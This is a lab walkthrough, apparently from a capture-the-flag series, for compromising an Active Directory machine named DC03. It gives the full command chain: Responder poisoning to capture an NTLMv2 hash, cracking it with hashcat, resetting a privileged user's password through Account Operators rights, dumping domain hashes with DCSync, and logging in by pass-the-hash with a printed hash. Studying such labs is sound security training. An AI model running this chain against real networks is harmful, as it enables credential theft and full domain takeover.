DC03

After we downloaded this machines and configured its network interface just like DC01, we are going to perform smb sweep to find the machine are going to hack:

Enumeration:

netexec smb 10.0.2.0/24

So the IP is 10.0.2.30, lets add it to the /etc/hosts file:

Perform Nmap scan all tcp ports:

sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local

Its another active directory machine.

We do not have a valid username and password, and could not get access anonymous access to smb or ldap. so other than that we could try some sniffing, for example listening for packets in the network using wireshark to get valid information, or some user trying to logging in since some companies do not care about if their internal networks have certificates, or we could also use Responder and wait for a user to try accessing a nonexistent directory or file on the network. Also we have to be in the same network to capture ntlmv2 hashes:

ifconfig
sudo responder -I eth0 –dwv

  • -I: Specify the interface.

  • -d: Enable answers for DHCP broadcast requests.

  • -w: Start the WPAD rogue proxy server.

  • -v: Increase verbosity.

Here we got xkate578 ntlmv2 hash, now we can save this hash to a file and then try to crack it:

hashcat xkate578.hash /usr/share/wordlists/rockyou.txt

It cracked and this is the password.

Abuse ACLs:

Now after that we have a valid credentials, we can use ldap to dump informations about the domain with bloodhound-python (But we need fake dns server) or ldapdomaindump:

ldapdomaindump 10.0.2.32 -u 'soupedecode.local\xkate578' -p 'jesuschrist' --no-json --no-grep

  • -u: Specify the username.

  • -p: For the password.

  • --no-json: Dont dump in json format.

  • --no-grep: Dont dump in grep format.

We can host a python webserver to host these files or open it directly with firefox:

python3 -m http.server 80

  • -m: Run module as a script.

Lets see what we have:

If we go to the user we own, we will see that we are member or the account operators group, which can enable us to add ourselves to groups, or change users' passwords:

Also if we take a look to the domain admins, we will see that there is a group that is part of it which is operators:

Lets check which users are in the operators group, because if we change their passwords, we will inherently become part of the Domain Admins, because operators group is part of the domain admins group:

We can use net rpc to change fbeth103 password, or we can use impacket-changepasswd:

net rpc password "fbeth103" 'Password!@#1' -U "soupedecode.local"/"xkate578"%"jesuschrist" -S "dc01.soupedecode.local"

  • -U: Specify the username.

  • -S: The domain controller.

Lets check if the password has been changed:

netexec smb soupedecode.local -u 'fbeth103' -p 'Password!@#1'

After we have a user that is part of the domain admins, we can perform DCSync to dump the domain hashes:

impacket-secretsdump soupedecode.local/'fbeth103:Password!@#1'@10.0.2.32

We have the domain administrato ntlm hash, and now we can authenticate via smb or winrm:

evil-winrm -i 10.0.2.32 -u administrator -H 2176416a80e4f62804f101d3a55d6c93

  • -i: For the IP address.

  • -H: To specify the NThash.

Here is the root flag, you can find the user flag in the smbclient or in xkate578 desktop.

PreviousDC02NextDC04

Last updated